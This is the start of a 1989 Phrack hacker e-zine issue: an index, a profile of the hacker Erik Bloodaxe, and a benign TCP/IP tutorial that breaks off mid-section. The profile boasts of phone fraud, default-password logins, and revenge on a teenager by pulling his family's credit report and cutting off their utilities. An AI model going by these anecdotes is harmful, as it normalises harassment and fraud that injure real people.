==Phrack Inc.== Volume Three, Issue 28, File #1 of 12 Phrack Inc. Newsletter Issue XXVIII Index ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ October 7, 1989 Greetings and welcome to Issue 28 of Phrack Inc. We really must apologize for the lateness of this issue, but sorting through all of the files sent in from over the entire summer as well as our own real life responsibilities have been keeping us both rather busy. This issue we feature Phrack World News Special Edition III. This file contains the exclusive coverage of SummerCon '89, which took place in St. Louis, Missouri on June 22-25, 1989. The Future Transcendent Saga continues in this issue with part one of a file about TCP/IP. We also present to you the beginning of a new irregular column called Network Miscellany by Taran King. Its exactly what it says it is -- interesting and important changes in, and tips about using, the Internet. It will contain different material each issue it is presented in to keep pace with the always changing wide area networks. Speaking of irregular columns, Phrack Pro-Phile returns this issue with a detailed look at Erik Bloodaxe of LOD. As always, we ask that anyone with network access drop us a line to either our Bitnet or Internet addresses... Taran King Knight Lightning C488869@UMCVMB.BITNET C483307@UMCVMB.BITNET C488869@UMCVMB.MISSOURI.EDU C483307@UMCVMB.MISSOURI.EDU And now we can also be reached via our new mail forwarding addresses (for those that cannot mail to our Bitnet or Internet addresses): ...!netsys!phrack or phrack@netsys.COM _______________________________________________________________________________ Table of Contents: 1. Phrack Inc. XXVIII Index by Taran King and Knight Lightning 2. Phrack Pro-Phile XXVIII on Erik Bloodaxe by Taran King 3. Introduction to the Internet Protocols: Chapter Eight of the FTS by KL 4. Network Miscellany by Taran King 5. A Real Functioning PEARL BOX Schematic by Dispater 6. Snarfing Remote Files by Dark OverLord 7. Other Common Carriers; A List By Equal Axis 8. Phrack World News Special Edition III (SummerCon '89) by Knight Lightning 9-12 Phrack World News XXVIII/Parts 1-4 by Knight Lightning _______________________________________________________________ ==Phrack Inc.== Volume Three, Issue 28, File #2 of 12 ==Phrack Pro-Phile XXVIII== Created and Written by Taran King Done on September 23, 1989 Welcome to Phrack Pro-Phile XXVIII. Phrack Pro-Phile was created to bring information to you, the community, about retired or highly important/ controversial people. This issue, we bring you a long time member of the hacking community and a charter member of the Legion Of Doom... Erik Bloodaxe ~~~~~~~~~~~~~ Handle: Erik Bloodaxe Call Him: Chris Handle Origin: "Vikings" by ? (Don't remember) Date Of Birth: 20 years ago Current Age: 20 Height: 5' 10" Weight: 130 Eye Color: Blue Hair Color: Brown Blood Type: A+ Sperm Count: 3 Computers: Atari 400, various dumb terminals, CompuAdd Turbo XT Origins in Phreak/Hack World ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Way back when he was in 7th grade, some 8+ years back, Erik was quite a shoplifter. As was the norm for 13 year-olds, he and a friend of his had stolen a stack of "girlie" magazines on one of their "raids." One of these was High Society, which was toying with the idea of "recorded entertainment." His friend was determined to hear this, but as the number was in New York, they decided to use the "strange phone service" his mother had signed up for to keep down the bill. He explained it to Erik, "You dial this number and then tell the operator your number and the phone number." They called it and told the operator a number that was 100 off by mistake. The operator said "Thank you," and the call went through. Thus was born a "code-abuser." They kept this information to themselves for several months. When the service changed to an automated format (rather than operator service), they began to share their knowledge. Word spread like wildfire. Interestingly enough, to this day, he can still backtrack 95% of all hacker-related code abuse from San Antonio back to himself as the originator of the information (well, a friend of a friend of a friend, etc..) Origins in Phreak/Hack BBSes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A friend of Bloodaxe's father bought a MicroModem II to get information from Dialog for his legal practice. He still remembers the first time he used it. His friend's dad used Dialog through Telenet. Once he saw Telenet, he began trying various addresses. One of the first things he ever did was get into a 212 VAX/VMS with GUEST/GUEST. Erik had absolutely no idea what he was doing. They were just guessing... typing things like "hello?", "catalog", and assorted other inane things. They also called a few BBSes that came with the modem instructions (using their long-distance trick). By the end of the weekend, they had worked their way to Pirates' Harbor (now TIMECOR) in 617, and Pirates' Cove 516. From then on, he was hooked on modems. Then, Wargames came out. Embarrassing as it is for Erik, Wargames really did play a part in imbedding the idea of computer "hacking" in his little head. (As it did for hundreds of others who are too insecure to admit it.) He had his little Atari 400, but no modem (Hayes 300's were still hundreds of dollars). Another friend got an Atari Acoustic Coupler for his 800. Born now were the Atari Warez D00dz. For about a year, they did nothing but call Atari BBSes (and anything that had "Pirate" in its name). They did stumble onto things like the Phone Booth in 303, OSUNY (on an OHIO Scientific, days before it went down), and Mines of Moria (713). Finally, he got an MPP modem. Bloodaxe was on it day and night. By this time they got into scanning. He was the one who checked everything out, as he was the one who was reading up on computer OSes at the UTSA library. They were still big into games, and they ran across a really new game called Behind Jaggi Lines. A guy named Devious Xevious traded them something called Software Blue Box for it, and gave them a BBS to call: Pirate-80. In 1983, Erik Bloodaxe entered the hack/phreak world. He was blue boxing most of his calls by then. People in the Phreak/Hack World Met ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bloodaxe has only met a handful "face-to-face," but has spoken with almost everyone around in the "golden-years," as he was heavily into conferences. Experience Gained In the Following Ways ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mainly trial and error. He would find a system, try to get in with simplistic username/password pairs, and then read help. He also reads a lot. He didn't speak out until he was sure of what he was talking about. Erik never asked any questions, but always listened. During the time he was a true "novice," he kept it fairly hidden, because he didn't want to seem stupid. Chris attributes the knowledge he has gained to himself. Memorable Phreak/Hack BBSes ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Pirate-80 (He still call to check in on Scott) Sherwood Forest I, II, III RACS III (Tuc wouldn't let him on until years after he first called!!) Plovernet (Before and after the move) COPS (Where he got mail from Lex telling him to call Legion of Doom) WOPR (Getting closer to what BBSes would become) Hacknet (217) Legion of Doom (The ultimate in BBSes at the time) Crystal Palace (OSUNY lives again!) Newsnet (Yes, Sir Knight's BBS) Blottoland (Lair of the rodents) Ripco (A looooooong time ago, certainly not now) The Broadway Show ("Well, Mike was a little off, but so what.") Farmers of Doom! (Run from a pay phone, complete chaos) The Connection (A good private BBS) Catch-22 (A "better" private BBS) The Pipeline (718) Freeworld II Executive Inn (Re-instilled his faith in BBSes) The Phoenix Project (What he would want his BBS to equal or surpass in quality) Black Ice (A big leak; ask anyone at the Ameritech security convention) Pure Nihilism (Too much fun!) Schooling/Work ~~~~~~~~~~~~~~ Chris is currently struggling as a Computer Science major at University of Texas in Austin with intentions of a PhD, specializing in AI research. Accomplishments ~~~~~~~~~~~~~~~ Project Educate: Was supposed to replace TAP after Tuc got fed up. No one really knows what happened to it. LOD/H TJ: Assorted work, major distributor. Numerous files. Phreak/Hack Groups ~~~~~~~~~~~~~~~~~~ LOD - In the original recruitment group, still in, still active. What more can be said? "LOD!" basically sums it all up. Camorra - Erik still gets mad about this. He was asked by the 602 Scorpion to join a group that was being formed. He agreed, and he then came up with Camorra as a name. The other members were Ax Murderer and 301 Executioner. He got Dr. Who, Silver Sabre, and Pit Fiend to join and Karl Marx, Tuc, and Videosmith were kind of in/out-not-really-into-groups-but-we'll-hang-out kind of members. Most of them were deep into their phones/computers. They were planning a series of files, such as the first Tymnet directory, a great COSMOS file, a database of scans, etc. Suddenly people began appearing in the group that no one voted on. The group kind of split up into two factions, "us and them." Bloodaxe and Dr. Who just got mad and blew it all off. Pit Fiend got busted, and the Scorpion disappeared. Interests ~~~~~~~~~ Packet networks (all), telco computers, Unixes, scanning (every night for almost 5 years!) Favorite Things ~~~~~~~~~~~~~~~ Beer--Tsing Tao, Michelob Dry, Coors Light. (He am in college, you know!) Ecstasy--Grinding away (His teeth and his mind). Getting into a system on the first try. Unprotected crontab files. Scanning. Anything, for anything, just doing it! A certain shapely 5'2" blonde who shall remain nameless. Most Memorable Experiences ~~~~~~~~~~~~~~~~~~~~~~~~~~ Alliance Teleconferencing way back when. Tandem scanning out other sites in Houston and Dallas. Transferring control to directory assistance ACD loops, and leaving it there until he wanted to run one. Waking up the next morning and yelling into the phone at everyone else who had stayed on the conference and starting to talk again. Conferences that lasted a week. Catching Draper in lies. Busying out all the 408 DA's. Boxing on a conference and trunking Karl Marx. Calling random numbers in California and adding them in if they sounded like teenage girls. "Giving" people unlimited trial usage of a "new" long distance service (LOD Telecommunications). Jennifer, the Alliance operator who had it out for him ("This is that Bloody-axe person isn't it?"). The Wharton School of Business Dec-10. For nearly a month all the nation's top phreaks and hackers hung out on this system and used the chat program. It was "the" place to be (kind of like an Altger Altos of the past, but no idiots). Finally they killed the account, not because of abuse, but because they were loading the system down. The students and operators were really cool about the whole thing. Finding (and spreading around everywhere) the White House Signal number. A number of my friends kept calling it, posing as the mayor of San Antonio, Henry Cisneros, eventually causing the Secret Service call our high school, and telling the administrators to grab the people using the payphone to find out what the hell they were trying to do. Taking down almost every BBS in Alaska when he was denied access to one. He pulled the poor kid's parents credit report, sent a copy to the kid over his modem, and disconnected the kid's phone, electricity, and water. He then went around taking down the BBSes where the kid had friends (guilt by association). Word got around the nation kind of fast. Erik got on most BBSes without much trouble after all that. He had a project to be on at least one BBS in every area code. Bloodaxe had to get on non-hack/pirate ones in a few areas, but he managed to do it. He stayed active on all of them for several months. At one time, he was on about 140 BBSes!!! Reading a new edition of Newsweek with a story by Richard Sandza in it over a very crowded conference, then suggesting that he should get some Slim Whitman albums and Civil War Chess Sets via his Visa. Erik pulled his history, to scare him, but lost it. When he pulled it later, there were nearly 100 inquiries, most by a certain Massachusetts Bank. At least they gave him a good source for a follow-up article. Finding out that a certain long distance service (reselling AT&T WATS) would reset to a WATS dialtone when 2600 was blasted and then setting up a program to call MTV's 900 number repeatedly to ensure that Duran Duran would get severely beaten. Bloodaxe remembers boxing up a conference while waiting for the police to come, and fighting the impulse to run away. He had tickets carded to Philadelphia International on a flight that afternoon (on the conference), and Telenet Bob was ready to meet Erik's flight, Mark Tabas was ready to send him a blank birth certificate, not to mention offers to stay with Dr. Who or Telenet Bob for as long as he needed to get settled. Karl Marx talked him out of it though. He was packed and ready to leave and become a new person in a new city. Looking back, he's DAMN glad he didn't do it! Bloodaxe and Who-Bob deciding one fateful day to see if they could talk to each other's port on Telenet using an ID they had used for the LOD Telenet directory. Some People to Mention ~~~~~~~~~~~~~~~~~~~~~~ Dr. Who -- "My closest hacker counterpart. We joke about being 60 with grandchildren, still having never met, calling each other daily, with stories about how we just defeated some ISDN service." The Mentor -- "My favorite drinking buddy. The first hacker I ever met face-to-face." Control C -- "One person who can almost equal me in outrageous behavior. Yes, Dan, I said almost! Nyahh Nyahh!" Inside Jokes ~~~~~~~~~~~~ Lame, Lame, Lame LEGION OF DOOM IN DALLAS...FEDS BAFFLED Serious Section ~~~~~~~~~~~~~~~ Chris makes it a point to make huge filibusters on boards where he sees anything having even anything remotely related to carding. Credit card fraud truly gives hacking a bad name. Snooping around a VAX is just electronic voyeurism... carding a new modem is just flat out blue-collar crime. It's just as bad as breaking into a house or kicking a puppy! He does everything he can (even up to turning off a number) to get credit information taken off a BBS. He also tries to remove codes from BBSes. He doesn't see code abuse in the same light as credit card fraud, (although the law does), but posted codes are the quickest way to get your board busted, and your computer confiscated. People should just find a local outdial to wherever they want to call and use that. If you only make local calls from an outdial, it will never die, you will keep out of trouble, and everyone will be happy. Marijuana, cocaine, LSD, MDMA (& analogs), and methamphetamine should be legalized and sold in a controlled fashion, regulated by the government. Money spent currently on combatting drug traffic should be spent on the deficit, and on drug education and rehabilitation. Making petty vices illegal only breeds crime; look at prohibition, look at gambling, look at how fast people go on the highway. You cannot fight a losing battle, and therefore, must take on a new strategy. Alcohol is the only drug he has ever imbibed and lost all consciousness and complete control of his actions. He thinks it is THE most dangerous drug around, and anyone can get as much of it as they want with very little effort. It is legal, but not everyone drinks. If marijuana was legal not everyone would smoke it. He wouldn't for one; he hates it. However, farmers would no longer lose their farms; and most importantly, the economy would be boosted greatly. Things have got to change. Are Phreaks/Hackers You've Met Generally Computer Geeks? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Of course not. There are some that are, but generally there is an average sampling of the general population. Hacking is just another hobby. Most people who collect comic books are not all the same, most people who play backgammon are not similar in physical characteristics either. The closest stereotype he could ever even say existed was 6 or so years ago, and that would be that most hackers then were Jewish and from New York state. An obnoxious Texan WASP like Chris really stood out. Thanks for your time, Chris. Taran King ________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 28, File #3 of 12 <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> <> <> <> Introduction to the Internet Protocols <> <> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <> <> Chapter Eight Of The Future Transcendent Saga <> <> <> <> Part One of Two Files <> <> <> <> Presented by Knight Lightning <> <> July 3, 1989 <> <> <> <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> Prologue ~~~~~~~~ Much of the material in this file comes from "Introduction to the Internet Protocols" by Charles L. Hedrick of Rutgers University. That material is copyrighted and is used in this file by permission. Time differention and changes in the wide area networks have made it necessary for some details of the file to updated and in some cases reworded for better understanding of our readers. Also, Unix is a trademark of AT&T Technologies, Inc. -- Just thought I'd let you know. If you are not already familiar with TCP/IP, I would suggest that you read "Introduction to MIDNET" (Phrack Inc., Volume Three, Issue 27, File 3 of 12) for more information. That file is Chapter Seven of The Future Transcendent Saga and contains information about TCP/IP and how it is used within the National Science Foundation Network (NSFnet). Table of Contents - Part One ~~~~~~~~~~~~~~~~~ * Introduction * What Is TCP/IP? * General Description Of The TCP/IP Protocols The TCP Level The IP Level The Ethernet Level Introduction ~~~~~~~~~~~~ This article is a brief introduction to TCP/IP, followed by suggestions on what to read for more information. This is not intended to be a complete description, but it can give you a reasonable idea of the capabilities of the protocols. However, if you need to know any details of the technology, you will want to read the standards yourself. Throughout the article, you will find references to the standards, in the form of "RFC" (Request For Comments) or "IEN" (Internet Engineering Notes) numbers -- these are document numbers. The final section (in Part Two) explains how you can get copies of those standards. What Is TCP/IP? ~~~~~~~~~~~~~~~ TCP/IP is a set of protocols developed to allow cooperating computers to share resources across a network. It was developed by a community of researchers centered around the ARPAnet. First some basic definitions; The most accurate name for the set of protocols I am describing is the "Internet protocol suite." TCP and IP are two of the protocols in this suite (they will be described below). Because TCP and IP are the best known of the protocols, it has become common to use the term TCP/IP to refer to the whole family. The Internet is a collection of networks, including the Arpanet, NSFnet, regional networks such as MIDnet (described in Chapter Seven of the Future Transcendent Saga), local networks at a number of University and research institutions, and a number of military networks. The term "Internet" applies to this entire set of networks. The subset of them that is managed by the Department of Defense is referred to as the "DDN" (Defense Data Network). This includes some research-oriented networks, such as the ARPAnet, as well as more strictly military ones (because much of the funding for Internet protocol developments is done via the DDN organization, the terms Internet and DDN can sometimes seem equivalent). All of these networks are connected to each other. Users can send messages from any of them to any other, except where there are security or other policy restrictions on access. Officially speaking, the Internet protocol documents are simply standards adopted by the Internet community for its own use. The Department of Defense once issued a MILSPEC definition of TCP/IP that was intended to be a more formal definition, appropriate for use in purchasing specifications. However most of the TCP/IP community continues to use the Internet standards. The MILSPEC version is intended to be consistent with it. Whatever it is called, TCP/IP is a family of protocols. A few provide "low-level" functions needed for many applications. These include IP, TCP, and UDP (all of which will be described in a bit more detail later in this file). Others are protocols for doing specific tasks, e.g. transferring files between computers, sending mail, or finding out who is logged in on another computer. Initially TCP/IP was used mostly between minicomputers or mainframes. These machines had their own disks, and generally were self-contained. Thus the most important "traditional" TCP/IP services are: - File Transfer -- The file transfer protocol (FTP) allows a user on any computer to get files from another computer, or to send files to another computer. Security is handled by requiring the user to specify a user name and password for the other computer. Provisions are made for handling file transfer between machines with different character set, end of line conventions, etc. This is not quite the same as "network file system" or "netbios" protocols, which will be described later. Instead, FTP is a utility that you run any time you want to access a file on another system. You use it to copy the file to your own system. You then can work with the local copy. (See RFC 959 for specifications for FTP.) - Remote Login -- The network terminal protocol (TELNET) allows a user to log in on any other computer on the network. You start a remote session by specifying a computer to connect to. From that time until you finish the session, anything you type is sent to the other computer. Note that you are really still talking to your own computer, but the telnet program effectively makes your computer invisible while it is running. Every character you type is sent directly to the other system. Generally, the connection to the remote computer behaves much like a dialup connection. That is, the remote system will ask you to log in and give a password, in whatever manner it would normally ask a user who had just dialed it up. When you log off of the other computer, the telnet program exits, and you will find yourself talking to your own computer. Microcomputer implementations of telnet generally include a terminal emulator for some common type of terminal. (See RFCs 854 and 855 for specifications for telnet. By the way, the telnet protocol should not be confused with Telenet, a vendor of commercial network services.) - Computer Mail -- This allows you to send messages to users on other computers. Originally, people tended to use only one or two specific computers and they would maintain "mail files" on those machines. The computer mail system is simply a way for you to add a message to another user's mail file. There are some problems with this in an environment where microcomputers are used. The most serious is that a micro is not well suited to receive computer mail. When you send mail, the mail software expects to be able to open a connection to the addressee's computer, in order to send the mail. If this is a microcomputer, it may be turned off, or it may be running an application other than the mail system. For this reason, mail is normally handled by a larger system, where it is practical to have a mail server running all the time. Microcomputer mail software then becomes a user interface that retrieves mail from the mail server. (See RFC 821 and 822 for specifications for computer mail. See RFC 937 for a protocol designed for microcomputers to use in reading mail from a mail server.) These services should be present in any implementation of TCP/IP, except that micro-oriented implementations may not support computer mail. These traditional applications still play a very important role in TCP/IP-based networks. However more recently, the way in which networks are used has been changing. The older model of a number of large, self-sufficient computers is beginning to change. Now many installations have several kinds of computers, including microcomputers, workstations, minicomputers, and mainframes. These computers are likely to be configured to perform specialized tasks. Although people are still likely to work with one specific computer, that computer will call on other systems on the net for specialized services. This has led to the "server/client" model of network services. A server is a system that provides a specific service for the rest of the network. A client is another system that uses that service. Note that the server and client need not be on different computers. They could be different programs running on the same computer. Here are the kinds of servers typically present in a modern computer setup. Also note that these computer services can all be provided within the framework of TCP/IP. - Network file systems. This allows a system to access files on another computer in a somewhat more closely integrated fashion than FTP. A network file system provides the illusion that disks or other devices from one system are directly connected to other systems. There is no need to use a special network utility to access a file on another system. Your computer simply thinks it has some extra disk drives. These extra "virtual" drives refer to the other system's disks. This capability is useful for several different purposes. It lets you put large disks on a few computers, but still give others access to the disk space. Aside from the obvious economic benefits, this allows people working on several computers to share common files. It makes system maintenance and backup easier, because you don't have to worry about updating and backing up copies on lots of different machines. A number of vendors now offer high-performance diskless computers. These computers have no disk drives at all. They are entirely dependent upon disks attached to common "file servers". (See RFC's 1001 and 1002 for a description of PC-oriented NetBIOS over TCP. In the workstation and minicomputer area, Sun's Network File System is more likely to be used. Protocol specifications for it are available from Sun Microsystems.) - remote printing. This allows you to access printers on other computers as if they were directly attached to yours. (The most commonly used protocol is the remote lineprinter protocol from Berkeley Unix. Unfortunately, there is no protocol document for this. However the C code is easily obtained from Berkeley, so implementations are common.) - Remote execution. This allows you to request that a particular program be run on a different computer. This is useful when you can do most of your work on a small computer, but a few tasks require the resources of a larger system. There are a number of different kinds of remote execution. Some operate on a command by command basis. That is, you request that a specific command or set of commands should run on some specific computer. (More sophisticated versions will choose a system that happens to be free.) However there are also "remote procedure call" systems that allow a program to call a subroutine that will run on another computer. (There are many protocols of this sort. Berkeley Unix contains two servers to execute commands remotely: rsh and rexec. The Unix "man" pages describe the protocols that they use. The user-contributed software with Berkeley 4.3 contains a "distributed shell" that will distribute tasks among a set of systems, depending upon load. - Name servers. In large installations, there are a number of different collections of names that have to be managed. This includes users and their passwords, names and network addresses for computers, and accounts. It becomes very tedious to keep this data up to date on all of the computers. Thus the databases are kept on a small number of systems. Other systems access the data over the network. (RFC 822 and 823 describe the name server protocol used to keep track of host names and Internet addresses on the Internet. This is now a required part of any TCP/IP implementation. IEN 116 describes an older name server protocol that is used by a few terminal servers and other products to look up host names. Sun's Yellow Pages system is designed as a general mechanism to handle user names, file sharing groups, and other databases commonly used by Unix systems. It is widely available commercially. Its protocol definition is available from Sun.) - Terminal servers. Many installations no longer connect terminals directly to computers. Instead they connect them to terminal servers. A terminal server is simply a small computer that only knows how to run telnet (or some other protocol to do remote login). If your terminal is connected to one of these, you simply type the name of a computer, and you are connected to it. Generally it is possible to have active connections to more than one computer at the same time. The terminal server will have provisions to switch between connections rapidly, and to notify you when output is waiting for another connection. (Terminal servers use the telnet protocol, already mentioned. However any real terminal server will also have to support name service and a number of other protocols.) - Network-oriented window systems. Until recently, high-performance graphics programs had to execute on a computer that had a bit-mapped graphics screen directly attached to it. Network window systems allow a program to use a display on a different computer. Full-scale network window systems provide an interface that lets you distribute jobs to the systems that are best suited to handle them, but still give you a single graphically-based user interface. (The most widely-implemented window system is X. A protocol description is available from MIT's Project Athena. A reference implementation is publically available from MIT. A number of vendors are also supporting NeWS, a window system defined by Sun. Both of these systems are designed to use TCP/IP.) Note that some of the protocols described above were designed by Berkeley, Sun, or other organizations. Thus they are not officially part of the Internet protocol suite. However they are implemented using TCP/IP, just as normal TCP/IP application protocols are. Since the protocol definitions are not considered proprietary, and since commercially-supported implementations are widely available, it is reasonable to think of these protocols as being effectively part of the Internet suite. Note that the list above is simply a sample of the sort of services available through TCP/IP. However it does contain the majority of the "major" applications. The other commonly-used protocols tend to be specialized facilities for getting information of various kinds, such as who is logged in, the time of day, etc. However if you need a facility that is not listed here, I encourage you to look through the current edition of Internet Protocols (currently RFC 1011), which lists all of the available protocols, and also to look at some of the major TCP/IP implementations to see what various vendors have added. General Description Of The TCP/IP Protocols ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ TCP/IP is a layered set of protocols. In order to understand what this means, it is useful to look at an example. A typical situation is sending mail. First, there is a protocol for mail. This defines a set of commands which one machine sends to another, e.g. commands to specify who the sender of the message is, who it is being sent to, and then the text of the message. However this protocol assumes that there is a way to communicate reliably between the two computers. Mail, like other application protocols, simply defines a set of commands and messages to be sent. It is designed to be used together with TCP and IP. TCP is responsible for making sure that the commands get through to the other end. It keeps track of what is sent, and retransmitts anything that did not get through. If any message is too large for one datagram, e.g. the text of the mail, TCP will split it up into several datagrams, and make sure that they all arrive correctly. Since these functions are needed for many applications, they are put together into a separate protocol, rather than being part of the specifications for sending mail. You can think of TCP as forming a library of routines that applications can use when they need reliable network communications with another computer. Similarly, TCP calls on the services of IP. Although the services that TCP supplies are needed by many applications, there are still some kinds of applications that don't need them. However there are some services that every application needs. So these services are put together into IP. As with TCP, you can think of IP as a library of routines that TCP calls on, but which is also available to applications that don't use TCP. This strategy of building several levels of protocol is called "layering." I like to think of the applications programs such as mail, TCP, and IP, as being separate "layers," each of which calls on the services of the layer below it. Generally, TCP/IP applications use 4 layers: - An application protocol such as mail. - A protocol such as TCP that provides services need by many applications. - IP, which provides the basic service of getting datagrams to their destination. - The protocols needed to manage a specific physical medium, such as Ethernet or a point to point line. TCP/IP is based on the "catenet model." (This is described in more detail in IEN 48.) This model assumes that there are a large number of independent networks connected together by gateways. The user should be able to access computers or other resources on any of these networks. Datagrams will often pass through a dozen different networks before getting to their final destination. The routing needed to accomplish this should be completely invisible to the user. As far as the user is concerned, all he needs to know in order to access another system is an "Internet address." This is an address that looks like 128.6.4.194. It is actually a 32-bit number. However it is normally written as 4 decimal numbers, each representing 8 bits of the address. (The term "octet" is used by Internet documentation for such 8-bit chunks. The term "byte" is not used, because TCP/IP is supported by some computers that have byte sizes other than 8 bits.) Generally the structure of the address gives you some information about how to get to the system. For example, 128.6 is a network number assigned by a central authority to Rutgers University. Rutgers uses the next octet to indicate which of the campus Ethernets is involved. 128.6.4 happens to be an Ethernet used by the Computer Science Department. The last octet allows for up to 254 systems on each Ethernet. (It is 254 because 0 and 255 are not allowed, for reasons that will be discussed later.) Note that 128.6.4.194 and 128.6.5.194 would be different systems. The structure of an Internet address is described in a bit more detail later. Of course I normally refer to systems by name, rather than by Internet address. When I specify a name, the network software looks it up in a database, and comes up with the corresponding Internet address. Most of the network software deals strictly in terms of the address. (RFC 882 describes the name server technology used to handle this lookup.) TCP/IP is built on "connectionless" technology. Information is transfered as a sequence of "datagrams." A datagram is a collection of data that is sent as a single message. Each of these datagrams is sent through the network individually. There are provisions to open connections (i.e. to start a conversation that will continue for some time). However at some level, information from those connections is broken up into datagrams, and those datagrams are treated by the network as completely separate. For example, suppose you want to transfer a 15000 octet file. Most networks can't handle a 15000 octet datagram. So the protocols will break this up into something like 30 500-octet datagrams. Each of these datagrams will be sent to the other end. At that point, they will be put back together into the 15000-octet file. However while those datagrams are in transit, the network doesn't know that there is any connection between them. It is perfectly possible that datagram 14 will actually arrive before datagram 13. It is also possible that somewhere in the network, an error will occur, and some datagram won't get through at all. In that case, that datagram has to be sent again. Note by the way that the terms "datagram" and "packet" often seem to be nearly interchangable. Technically, datagram is the right word to use when describing TCP/IP. A datagram is a unit of data, which is what the protocols deal with. A packet is a physical thing, appearing on an Ethernet or some wire. In most cases a packet simply contains a datagram, so there is very little difference. However they can differ. When TCP/IP is used on top of X.25, the X.25 interface breaks the datagrams up into 128-byte packets. This is invisible to IP, because the packets are put back together into a single datagram at the other end before being processed by TCP/IP. So in this case, one IP datagram would be carried by several packets. However with most media, there are efficiency advantages to sending one datagram per packet, and so the distinction tends to vanish. * The TCP level Two separate protocols are involved in handling TCP/IP datagrams. TCP (the "transmission control protocol") is responsible for breaking up the message into datagrams, reassembling them at the other end, resending anything that gets lost, and putting things back in the right order. IP (the "internet protocol") is responsible for routing individual datagrams. It may seem like TCP is doing all the work. However in the Internet, simply getting a datagram to its destination can be a complex job. A connection may require the datagram to go through several networks at Rutgers, a serial line to the John von Neuman Supercomputer Center, a couple of Ethernets there, a series of 56Kbaud phone lines to another NSFnet site, and more Ethernets on another campus. Keeping track of the routes to all of the destinations and handling incompatibilities among different transport media turns out to be a complex job. Note that the interface between TCP and IP is fairly simple. TCP simply hands IP a datagram with a destination. IP doesn't know how this datagram relates to any datagram before it or after it. It may have occurred to you that something is missing here. I have talked about Internet addresses, but not about how you keep track of multiple connections to a given system. Clearly it isn't enough to get a datagram to the right destination. TCP has to know which connection this datagram is part of. This task is referred to as "demultiplexing." In fact, there are several levels of demultiplexing going on in TCP/IP. The information needed to do this demultiplexing is contained in a series of "headers." A header is simply a few extra octets tacked onto the beginning of a datagram by some protocol in order to keep track of it. It's a lot like putting a letter into an envelope and putting an address on the outside of the envelope. Except with modern networks it happens several times. It's like you put the letter into a little envelope, your secretary puts that into a somewhat bigger envelope, the campus mail center puts that envelope into a still bigger one, etc. Here is an overview of the headers that get stuck on a message that passes through a typical TCP/IP network: It starts with a single data stream, say a file you are trying to send to some other computer: ...................................................... TCP breaks it up into manageable chunks. (In order to do this, TCP has to know how large a datagram your network can handle. Actually, the TCP's at each end say how big a datagram they can handle, and then they pick the smallest size.) .... .... .... .... .... .... .... .... TCP puts a header at the front of each datagram. This header actually contains at least 20 octets, but the most important ones are a source and destination "port number" and a "sequence number." The port numbers are used to keep track of different conversations. Suppose 3 different people are transferring files. Your TCP might allocate port numbers 1000, 1001, and 1002 to these transfers. When you are sending a datagram, this becomes the "source" port number, since you are the source of the datagram. Of course the TCP at the other end has assigned a port number of its own for the conversation. Your TCP has to know the port number used by the other end as well. (It finds out when the connection starts, as I will explain below.) It puts this in the "destination" port field. Of course if the other end sends a datagram back to you, the source and destination port numbers will be reversed, since then it will be the source and you will be the destination. Each datagram has a sequence number. This is used so that the other end can make sure that it gets the datagrams in the right order, and that it hasn't missed any. (See the TCP specification for details.) TCP doesn't number the datagrams, but the octets. So if there are 500 octets of data in each datagram, the first datagram might be numbered 0, the second 500, the next 1000, the next 1500, etc. Finally, I will mention the Checksum. This is a number that is computed by adding up all the octets in the datagram (more or less - see the TCP spec). The result is put in the header. TCP at the other end computes the checksum again. If they disagree, then something bad happened to the datagram in transmission, and it is thrown away. So here's what the datagram looks like now. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | your data ... next 500 octets | | ...... | If you abbreviate the TCP header as "T", the whole file now looks like this: T.... T.... T.... T.... T.... T.... T.... You will note that there are items in the header that I have not described above. They are generally involved with managing the connection. In order to make sure the datagram has arrived at its destination, the recipient has to send back an "acknowledgement." This is a datagram whose "Acknowledgement number" field is filled in. For example, sending a packet with an acknowledgement of 1500 indicates that you have received all the data up to octet number 1500. If the sender doesn't get an acknowledgement within a reasonable amount of time, it sends the data again. The window is used to control how much data can be in transit at any one time. It is not practical to wait for each datagram to be acknowledged before sending the next one. That would slow things down too much. On the other hand, you can't just keep sending, or a fast computer might overrun the capacity of a slow one to absorb data. Thus each end indicates how much new data it is currently prepared to absorb by putting the number of octets in its "Window" field. As the computer receives data, the amount of space left in its window decreases. When it goes to zero, the sender has to stop. As the receiver processes the data, it increases its window, indicating that it is ready to accept more data. Often the same datagram can be used to acknowledge receipt of a set of data and to give permission for additional new data (by an updated window). The "Urgent" field allows one end to tell the other to skip ahead in its processing to a particular octet. This is often useful for handling asynchronous events, for example when you type a control character or other command that interrupts output. The other fields are not pertinent to understanding what I am trying to explain in this article. * The IP Level TCP sends each datagram to IP. Of course it has to tell IP the Internet address of the computer at the other end. Note that this is all IP is concerned about. It doesn't care about what is in the datagram, or even in the TCP header. IP's job is simply to find a route for the datagram and get it to the other end. In order to allow gateways or other intermediate systems to forward the 